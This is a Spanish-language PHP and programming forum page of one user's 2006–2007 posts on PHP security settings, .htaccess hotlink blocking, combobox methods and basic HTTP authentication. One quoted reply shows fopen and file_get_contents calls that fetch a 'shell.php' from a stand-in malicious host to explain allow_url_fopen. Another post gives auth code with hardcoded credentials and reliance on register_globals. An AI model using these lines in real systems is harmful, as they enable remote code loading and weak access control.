elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Programación / PHP / Re: seguridad en php en: 23 Enero 2007, 02:33 am
ahora mira allow_url_fopen
deshabilita las url remotas en funciones como fopen , file_get_contents, etc
por ejemplo tu no podrias hacer esto
Código:
fopen("http.//www.webmaliciosa.com/shell.php","r")
file_get_contents("http.//www.webmaliciosa.com/shell.php")

Espero haberte ayudado aunque sea un poco
Saludos.


Sigo sin entender esto, pero esto en el caso de estar habilitado comprometeria la seguridad de otros servidores no del tuyo no? pq con esto lo que haces es que tu puedas tratar urls externas como ficheros y no alreves. O esque no lo estoy entendiendo bien??
12  Programación / PHP / seguridad en php en: 23 Enero 2007, 01:28 am
Hola, he estado leyendo sobre el tema de la seguridad en php, pero hay cosas que no he entendido bien. He leido en varios sitios que para aumentar la seguridad hay que tener deshabilitado allow_url_fopen y no entiendo porque realmente. Esto no es para que el servidor apache te permita tratar las URL como ficheros? Entonces como aumenta la seguridad si está off ?

Otra cosa que no entiendo es que tambien recomiendan desactivar register_globals, tampoco entiendo porque dejando esto en off aumenta la seguridad del servidor; ya que el impedimento que le veo a esto esque no se pueden pasar variables atraves de la url.


En fin , me gustaría que alguien me explicara esto un poco mas afondo, gracias
13  Programación / PHP / Re: link con php en: 13 Diciembre 2006, 20:57 pm
sip
14  Programación / PHP / Re: link con php en: 12 Diciembre 2006, 23:22 pm
Esto se hace configurando el archivo .httaccess de tu servidor apache. Para evitar el hotlink de imagenes lo tendrías que configurar así:


Ejemplo para denegar la carga externa de imágenes o link de archivos

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?midominio.com/.*$ [NC]
RewriteRule \.(gif|jpg|zip|rar|mp3)$ - [F]

Otra opción que puedes utilizar es denegar la carga externa, pero mostrando una imágen por defecto a tú elección...

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?midominio.com/.*$ [NC]
RewriteRule \.(gif|jpg)$ http://www.midominio.com/imagen.gif [R,L]


Para que te funcione tienes que tener habilitado el mod rewrite, sino no te funcionará.
15  Programación / .NET (C#, VB.NET, ASP) / Re: combobox en c# en: 12 Diciembre 2006, 14:02 pm
xD esq no me apetecia hacer un metodo, supuse que habria algun metodo ya implementado jeje
16  Programación / .NET (C#, VB.NET, ASP) / combobox en c# en: 10 Diciembre 2006, 20:32 pm
Hola, alguno me puede decir cual es el metodo que me devuelve un array con todos los items que contiene un combobox porfavor?
17  Media / Juegos y Consolas / Re: Todos los Age of Empires en 1 DVD !!! en: 9 Diciembre 2006, 20:24 pm
Joder, muchas gracías por esto pisha, a mi hermanita le va a encantar  :P 

GRACIAS!!!
18  Programación / PHP / Re: validacion de usuario no me funciona!!! en: 9 Diciembre 2006, 19:37 pm
Usa esto que está simplificado y nos cuentas. Además no entiendo para que usas la 1ª condición si con la 2ª te vale.


Código:
<?php
   if (($PHP_AUTH_USER!="user") || ($PHP_AUTH_PW!="pass")) {
      header('WWW-Authenticate: Basic realm="Acceso restringido"');
      header('HTTP/1.0 401 Unauthorized');
      echo 'Authorization Required.';
      exit;
   }
?>
<html>
<head>
</head>
<body>
Dentro de la zona restringida.
</body>
</html>
19  Programación / PHP / Re: link con php en: 8 Diciembre 2006, 23:49 pm
jejeje, solo era que nunca habia visto <?= no sabia que equivalise aun echo
20  Programación / PHP / Re: link con php en: 8 Diciembre 2006, 23:04 pm
tambien asi
Código:
<a href="<?= $link?>">texto<a>


Estás seguro que así tambien? Para mi que no. No lo he probado, pero para mi que no tiene mucho sentido no se.
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines